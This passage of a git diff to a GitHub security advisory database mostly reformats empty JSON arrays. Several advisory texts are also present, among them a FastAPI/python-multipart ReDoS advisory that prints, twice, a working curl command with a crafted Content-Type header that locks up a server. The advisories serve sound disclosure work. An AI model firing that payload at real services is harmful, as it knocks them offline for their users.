"details": "The `rquickjs` crate used by SurrealDB implements Rust bindings to the QuickJS C library and is used to execute SurrealDB scripting functions. The `rquickjs` function `Exception::throw_type` takes a string and returns an error object. Prior to version `0.4.2` of the crate, this string would be fed directly into `printf`, which will receive the error string as a format string with no additional arguments, leading to undefined behavior. This issue triggers when a SurrealDB scripting function returns an error and its input contains a format string such as `%s` or `%d`. \n\nThis vulnerability can only affect SurrealDB servers explicitly enabling the scripting capability with `--allow-scripting` or `--allow-all` and equivalent environment variables `SURREAL_CAPS_ALLOW_SCRIPT=true` and `SURREAL_CAPS_ALLOW_ALL=true`.\n\n### Impact\n\nAn attacker with privileges to execute scripting functions with arbitrary inputs may be able to exploit this format string vulnerability in order read arbitrary memory from the remote SurrealDB process. A format string vulnerability may also be further exploited to execute arbitrary code with the privileges of the SurrealDB process.\n\nThe fact that error messages are limited to 256 bytes coupled with [exploit mitigation features supported in Rust executables](https://doc.rust-lang.org/rustc/exploit-mitigations.html#exploit-mitigations-1) may somewhat increase the complexity of exploiting this vulnerability to reliably achieve remote code execution in practice.\n\n### Patches\n\n- Version 1.1.1 and later are not affected by this issue.\n\n### Workarounds\n\nUsers unable to update should restrict access from untrusted users to define and execute scripting functions. This can be achieved by removing the scripting capability by default or with `--deny-scripting` and equivalent environment variable `SURREAL_CAPS_DENY_SCRIPT=true`. If not possible, network access should be limited to trusted users.\n\n### References\n\n- https://github.com/surrealdb/surrealdb/issues/3327\n- https://github.com/surrealdb/surrealdb/pull/3332\n- https://github.com/DelSkayn/rquickjs/pull/247",
"severity": [
@@ -54,9 +52,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2024-02-21T00:04:05Z",
diff --git a/advisories/github-reviewed/2024/02/GHSA-qf9m-vfgh-m389/GHSA-qf9m-vfgh-m389.json b/advisories/github-reviewed/2024/02/GHSA-qf9m-vfgh-m389/GHSA-qf9m-vfgh-m389.json
index b59a838f27e..918e82a5659 100644
--- a/advisories/github-reviewed/2024/02/GHSA-qf9m-vfgh-m389/GHSA-qf9m-vfgh-m389.json
+++ b/advisories/github-reviewed/2024/02/GHSA-qf9m-vfgh-m389/GHSA-qf9m-vfgh-m389.json
@@ -4,9 +4,7 @@
"modified": "2024-02-20T18:16:58Z",
"published": "2024-02-05T17:01:54Z",
"withdrawn": "2024-02-16T23:37:39Z",
- "aliases": [
-
- ],
+ "aliases": [],
"summary": "Duplicate Advisory: FastAPI Content-Type Header ReDoS",
"details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-2jv5-9r88-3w3p. This link is maintained to preserve external references.\n\n## Original Description\n\n### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\nThis is also reported to Starlette at: https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\n\n### PoC\n\nCreate a FastAPI app that uses form data:\n\n```Python\n# main.py\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nThen start it with:\n\n```console\n$ uvicorn main:app\n\nINFO: Started server process [50601]\nINFO: Waiting for application startup.\nINFO: ASGI 'lifespan' protocol appears unsupported.\nINFO: Application startup complete.\nINFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\n#### Stopping it\n\nBecause that holds the main loop consuming the CPU non-stop, it's not possible to simply kill Uvicorn with `Ctrl+C` as it can't handle the signal.\n\nTo stop it, first check the process ID running Uvicorn:\n\n```console\n$ ps -fA | grep uvicorn\n\n 501 59461 24785 0 4:28PM ttys004 0:00.13 /Users/user/code/starlette/env3.10/bin/python /Users/user/code/starlette/env3.10/bin/uvicorn redos_starlette:app\n 501 59466 99935 0 4:28PM ttys010 0:00.00 grep uvicorn\n```\n\nIn this case, the process ID was `59461`, then you can kill it (forcefully, with `-9`) with:\n\n```console\n$ kill -9 59461\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n\nOriginal report to FastAPI
\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n ",
"severity": [
diff --git a/advisories/github-reviewed/2024/02/GHSA-x577-gcc9-9xjj/GHSA-x577-gcc9-9xjj.json b/advisories/github-reviewed/2024/02/GHSA-x577-gcc9-9xjj/GHSA-x577-gcc9-9xjj.json
index 0b6377fda00..dfc656ad862 100644
--- a/advisories/github-reviewed/2024/02/GHSA-x577-gcc9-9xjj/GHSA-x577-gcc9-9xjj.json
+++ b/advisories/github-reviewed/2024/02/GHSA-x577-gcc9-9xjj/GHSA-x577-gcc9-9xjj.json
@@ -81,9 +81,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": true,
"github_reviewed_at": "2024-02-29T20:09:58Z",
diff --git a/advisories/github-reviewed/2024/03/GHSA-vcc3-rw6f-jv97/GHSA-vcc3-rw6f-jv97.json b/advisories/github-reviewed/2024/03/GHSA-vcc3-rw6f-jv97/GHSA-vcc3-rw6f-jv97.json
index 76c207fe9a2..f2bae5ad0be 100644
--- a/advisories/github-reviewed/2024/03/GHSA-vcc3-rw6f-jv97/GHSA-vcc3-rw6f-jv97.json
+++ b/advisories/github-reviewed/2024/03/GHSA-vcc3-rw6f-jv97/GHSA-vcc3-rw6f-jv97.json
@@ -3,14 +3,10 @@
"id": "GHSA-vcc3-rw6f-jv97",
"modified": "2024-03-18T20:38:40Z",
"published": "2024-03-18T20:38:40Z",
- "aliases": [
-
- ],
+ "aliases": [],
"summary": "Use-after-free in libxml2 via Nokogiri::XML::Reader",
"details": "### Summary\n\nNokogiri upgrades its dependency libxml2 as follows:\n- v1.15.6 upgrades libxml2 to 2.11.7 from 2.11.6\n- v1.16.2 upgrades libxml2 to 2.12.5 from 2.12.4\n\nlibxml2 v2.11.7 and v2.12.5 address the following vulnerability:\n\nCVE-2024-25062 / https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25062\n- described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/604\n- patched by https://gitlab.gnome.org/GNOME/libxml2/-/commit/92721970\n\nPlease note that this advisory only applies to the CRuby implementation of Nokogiri, and only if\nthe packaged libraries are being used. If you've overridden defaults at installation time to use\nsystem libraries instead of packaged libraries, you should instead pay attention to your distro's\nlibxml2 release announcements.\n\nJRuby users are not affected.\n\n### Severity\n\nThe Nokogiri maintainers have evaluated this as **Moderate**.\n\n### Impact\n\nFrom the CVE description, this issue applies to the `xmlTextReader` module (which underlies\n`Nokogiri::XML::Reader`):\n\n> When using the XML Reader interface with DTD validation and XInclude expansion enabled,\n> processing crafted XML documents can lead to an xmlValidatePopElement use-after-free.\n\n### Mitigation\n\nUpgrade to Nokogiri `~> 1.15.6` or `>= 1.16.2`.\n\nUsers who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile\nand link Nokogiri against patched external libxml2 libraries which will also address these same\nissues.\n",
- "severity": [
-
- ],
+ "severity": [],
"affected": [
{
"package": {
diff --git a/advisories/github-reviewed/2024/09/GHSA-2gh6-wc3m-g37f/GHSA-2gh6-wc3m-g37f.json b/advisories/github-reviewed/2024/09/GHSA-2gh6-wc3m-g37f/GHSA-2gh6-wc3m-g37f.json
index f4940746b50..f03d61f5f3e 100644
--- a/advisories/github-reviewed/2024/09/GHSA-2gh6-wc3m-g37f/GHSA-2gh6-wc3m-g37f.json
+++ b/advisories/github-reviewed/2024/09/GHSA-2gh6-wc3m-g37f/GHSA-2gh6-wc3m-g37f.json
@@ -3,9 +3,7 @@
"id": "GHSA-2gh6-wc3m-g37f",
"modified": "2024-09-17T19:29:24Z",
"published": "2024-09-17T19:29:24Z",
- "aliases": [
-
- ],
+ "aliases": [],
"summary": "hermes-management is vulnerable to RCE due to Apache commons-jxpath",
"details": "### Impact\nhermes-management is vulnerable to RCE when it processes user-controlled data due to using Apache commons-jxpath.\n\n### Patches\nUpgrade Hermes to at least hermes-2.2.9\n\n### References\nhttps://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/\n",
"severity": [
diff --git a/advisories/github-reviewed/2024/09/GHSA-8wm9-24qg-m5qj/GHSA-8wm9-24qg-m5qj.json b/advisories/github-reviewed/2024/09/GHSA-8wm9-24qg-m5qj/GHSA-8wm9-24qg-m5qj.json
index 910adb0f324..b4adf7ac0b9 100644
--- a/advisories/github-reviewed/2024/09/GHSA-8wm9-24qg-m5qj/GHSA-8wm9-24qg-m5qj.json
+++ b/advisories/github-reviewed/2024/09/GHSA-8wm9-24qg-m5qj/GHSA-8wm9-24qg-m5qj.json
@@ -4,9 +4,7 @@
"modified": "2024-09-17T22:22:26Z",
"published": "2024-09-03T21:31:12Z",
"withdrawn": "2024-09-17T22:22:26Z",
- "aliases": [
-
- ],
+ "aliases": [],
"summary": "Duplicate Advisory: Keycloak has a brute force login protection bypass",
"details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-gc7q-jgjv-vjr2. This link is maintained to preserve external references.\n\n## Original Description\nA vulnerability was found in Keycloak. This flaw allows attackers to bypass brute force protection by exploiting the timing of login attempts. By initiating multiple login requests simultaneously, attackers can exceed the configured limits for failed attempts before the system locks them out. This timing loophole enables attackers to make more guesses at passwords than intended, potentially compromising account security on affected systems.",
"severity": [
diff --git a/advisories/unreviewed/2022/01/GHSA-9fvj-4grr-mv9j/GHSA-9fvj-4grr-mv9j.json b/advisories/unreviewed/2022/01/GHSA-9fvj-4grr-mv9j/GHSA-9fvj-4grr-mv9j.json
index b2c3908b1f0..587f4bf522b 100644
--- a/advisories/unreviewed/2022/01/GHSA-9fvj-4grr-mv9j/GHSA-9fvj-4grr-mv9j.json
+++ b/advisories/unreviewed/2022/01/GHSA-9fvj-4grr-mv9j/GHSA-9fvj-4grr-mv9j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/01/GHSA-cffq-m726-w77f/GHSA-cffq-m726-w77f.json b/advisories/unreviewed/2022/01/GHSA-cffq-m726-w77f/GHSA-cffq-m726-w77f.json
index 328c49aef61..0cfb19d1988 100644
--- a/advisories/unreviewed/2022/01/GHSA-cffq-m726-w77f/GHSA-cffq-m726-w77f.json
+++ b/advisories/unreviewed/2022/01/GHSA-cffq-m726-w77f/GHSA-cffq-m726-w77f.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/01/GHSA-fgwx-697g-22hm/GHSA-fgwx-697g-22hm.json b/advisories/unreviewed/2022/01/GHSA-fgwx-697g-22hm/GHSA-fgwx-697g-22hm.json
index 3793533a195..1edb070e7ac 100644
--- a/advisories/unreviewed/2022/01/GHSA-fgwx-697g-22hm/GHSA-fgwx-697g-22hm.json
+++ b/advisories/unreviewed/2022/01/GHSA-fgwx-697g-22hm/GHSA-fgwx-697g-22hm.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/01/GHSA-fh28-f6m7-2h5v/GHSA-fh28-f6m7-2h5v.json b/advisories/unreviewed/2022/01/GHSA-fh28-f6m7-2h5v/GHSA-fh28-f6m7-2h5v.json
index d47735ebac5..ccfd593c910 100644
--- a/advisories/unreviewed/2022/01/GHSA-fh28-f6m7-2h5v/GHSA-fh28-f6m7-2h5v.json
+++ b/advisories/unreviewed/2022/01/GHSA-fh28-f6m7-2h5v/GHSA-fh28-f6m7-2h5v.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/01/GHSA-jgrp-9rqg-rqhp/GHSA-jgrp-9rqg-rqhp.json b/advisories/unreviewed/2022/01/GHSA-jgrp-9rqg-rqhp/GHSA-jgrp-9rqg-rqhp.json
index 1a185c9c88e..5558c43e27b 100644
--- a/advisories/unreviewed/2022/01/GHSA-jgrp-9rqg-rqhp/GHSA-jgrp-9rqg-rqhp.json
+++ b/advisories/unreviewed/2022/01/GHSA-jgrp-9rqg-rqhp/GHSA-jgrp-9rqg-rqhp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/02/GHSA-fr63-458q-29q2/GHSA-fr63-458q-29q2.json b/advisories/unreviewed/2022/02/GHSA-fr63-458q-29q2/GHSA-fr63-458q-29q2.json
index c8fa7c59f53..865c23e8df3 100644
--- a/advisories/unreviewed/2022/02/GHSA-fr63-458q-29q2/GHSA-fr63-458q-29q2.json
+++ b/advisories/unreviewed/2022/02/GHSA-fr63-458q-29q2/GHSA-fr63-458q-29q2.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/02/GHSA-j783-7r4g-pwjc/GHSA-j783-7r4g-pwjc.json b/advisories/unreviewed/2022/02/GHSA-j783-7r4g-pwjc/GHSA-j783-7r4g-pwjc.json
index 2d49bfd4cdc..5d8c97b4f7f 100644
--- a/advisories/unreviewed/2022/02/GHSA-j783-7r4g-pwjc/GHSA-j783-7r4g-pwjc.json
+++ b/advisories/unreviewed/2022/02/GHSA-j783-7r4g-pwjc/GHSA-j783-7r4g-pwjc.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/02/GHSA-j85g-452w-9q39/GHSA-j85g-452w-9q39.json b/advisories/unreviewed/2022/02/GHSA-j85g-452w-9q39/GHSA-j85g-452w-9q39.json
index f3f88085969..9398364eaae 100644
--- a/advisories/unreviewed/2022/02/GHSA-j85g-452w-9q39/GHSA-j85g-452w-9q39.json
+++ b/advisories/unreviewed/2022/02/GHSA-j85g-452w-9q39/GHSA-j85g-452w-9q39.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/02/GHSA-jhfm-vpj4-vj2f/GHSA-jhfm-vpj4-vj2f.json b/advisories/unreviewed/2022/02/GHSA-jhfm-vpj4-vj2f/GHSA-jhfm-vpj4-vj2f.json
index fa367ee33b8..d07c5141899 100644
--- a/advisories/unreviewed/2022/02/GHSA-jhfm-vpj4-vj2f/GHSA-jhfm-vpj4-vj2f.json
+++ b/advisories/unreviewed/2022/02/GHSA-jhfm-vpj4-vj2f/GHSA-jhfm-vpj4-vj2f.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/02/GHSA-jj48-h62x-6q55/GHSA-jj48-h62x-6q55.json b/advisories/unreviewed/2022/02/GHSA-jj48-h62x-6q55/GHSA-jj48-h62x-6q55.json
index 9ad5853d105..5416425a267 100644
--- a/advisories/unreviewed/2022/02/GHSA-jj48-h62x-6q55/GHSA-jj48-h62x-6q55.json
+++ b/advisories/unreviewed/2022/02/GHSA-jj48-h62x-6q55/GHSA-jj48-h62x-6q55.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/02/GHSA-mrg4-hwp5-c6hc/GHSA-mrg4-hwp5-c6hc.json b/advisories/unreviewed/2022/02/GHSA-mrg4-hwp5-c6hc/GHSA-mrg4-hwp5-c6hc.json
index 9a963d9a5a4..3f34dfbd7fd 100644
--- a/advisories/unreviewed/2022/02/GHSA-mrg4-hwp5-c6hc/GHSA-mrg4-hwp5-c6hc.json
+++ b/advisories/unreviewed/2022/02/GHSA-mrg4-hwp5-c6hc/GHSA-mrg4-hwp5-c6hc.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/02/GHSA-mwwv-v58h-qcvw/GHSA-mwwv-v58h-qcvw.json b/advisories/unreviewed/2022/02/GHSA-mwwv-v58h-qcvw/GHSA-mwwv-v58h-qcvw.json
index 9df0f7f348d..18693d91286 100644
--- a/advisories/unreviewed/2022/02/GHSA-mwwv-v58h-qcvw/GHSA-mwwv-v58h-qcvw.json
+++ b/advisories/unreviewed/2022/02/GHSA-mwwv-v58h-qcvw/GHSA-mwwv-v58h-qcvw.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/03/GHSA-7gx3-2prj-gfr9/GHSA-7gx3-2prj-gfr9.json b/advisories/unreviewed/2022/03/GHSA-7gx3-2prj-gfr9/GHSA-7gx3-2prj-gfr9.json
index 30d2cfc802f..ffd7404822d 100644
--- a/advisories/unreviewed/2022/03/GHSA-7gx3-2prj-gfr9/GHSA-7gx3-2prj-gfr9.json
+++ b/advisories/unreviewed/2022/03/GHSA-7gx3-2prj-gfr9/GHSA-7gx3-2prj-gfr9.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/03/GHSA-j832-43w3-m333/GHSA-j832-43w3-m333.json b/advisories/unreviewed/2022/03/GHSA-j832-43w3-m333/GHSA-j832-43w3-m333.json
index aa2d85f2dc4..e7748abe57a 100644
--- a/advisories/unreviewed/2022/03/GHSA-j832-43w3-m333/GHSA-j832-43w3-m333.json
+++ b/advisories/unreviewed/2022/03/GHSA-j832-43w3-m333/GHSA-j832-43w3-m333.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/03/GHSA-vgmm-r7wp-gmv8/GHSA-vgmm-r7wp-gmv8.json b/advisories/unreviewed/2022/03/GHSA-vgmm-r7wp-gmv8/GHSA-vgmm-r7wp-gmv8.json
index 710b60d8a7d..56c29fbe1c5 100644
--- a/advisories/unreviewed/2022/03/GHSA-vgmm-r7wp-gmv8/GHSA-vgmm-r7wp-gmv8.json
+++ b/advisories/unreviewed/2022/03/GHSA-vgmm-r7wp-gmv8/GHSA-vgmm-r7wp-gmv8.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/03/GHSA-wg3j-ppp5-jg9q/GHSA-wg3j-ppp5-jg9q.json b/advisories/unreviewed/2022/03/GHSA-wg3j-ppp5-jg9q/GHSA-wg3j-ppp5-jg9q.json
index bd8614aa7ac..deb5458f52f 100644
--- a/advisories/unreviewed/2022/03/GHSA-wg3j-ppp5-jg9q/GHSA-wg3j-ppp5-jg9q.json
+++ b/advisories/unreviewed/2022/03/GHSA-wg3j-ppp5-jg9q/GHSA-wg3j-ppp5-jg9q.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/04/GHSA-2grp-34h8-p48c/GHSA-2grp-34h8-p48c.json b/advisories/unreviewed/2022/04/GHSA-2grp-34h8-p48c/GHSA-2grp-34h8-p48c.json
index 41206403692..5c45feb5652 100644
--- a/advisories/unreviewed/2022/04/GHSA-2grp-34h8-p48c/GHSA-2grp-34h8-p48c.json
+++ b/advisories/unreviewed/2022/04/GHSA-2grp-34h8-p48c/GHSA-2grp-34h8-p48c.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/04/GHSA-f2v4-c8r6-vfvj/GHSA-f2v4-c8r6-vfvj.json b/advisories/unreviewed/2022/04/GHSA-f2v4-c8r6-vfvj/GHSA-f2v4-c8r6-vfvj.json
index e878c3c30d1..50969a3e0b7 100644
--- a/advisories/unreviewed/2022/04/GHSA-f2v4-c8r6-vfvj/GHSA-f2v4-c8r6-vfvj.json
+++ b/advisories/unreviewed/2022/04/GHSA-f2v4-c8r6-vfvj/GHSA-f2v4-c8r6-vfvj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-227v-w3r6-6vc4/GHSA-227v-w3r6-6vc4.json b/advisories/unreviewed/2022/05/GHSA-227v-w3r6-6vc4/GHSA-227v-w3r6-6vc4.json
index d1ac5c9db3b..81d7f9e6b2f 100644
--- a/advisories/unreviewed/2022/05/GHSA-227v-w3r6-6vc4/GHSA-227v-w3r6-6vc4.json
+++ b/advisories/unreviewed/2022/05/GHSA-227v-w3r6-6vc4/GHSA-227v-w3r6-6vc4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
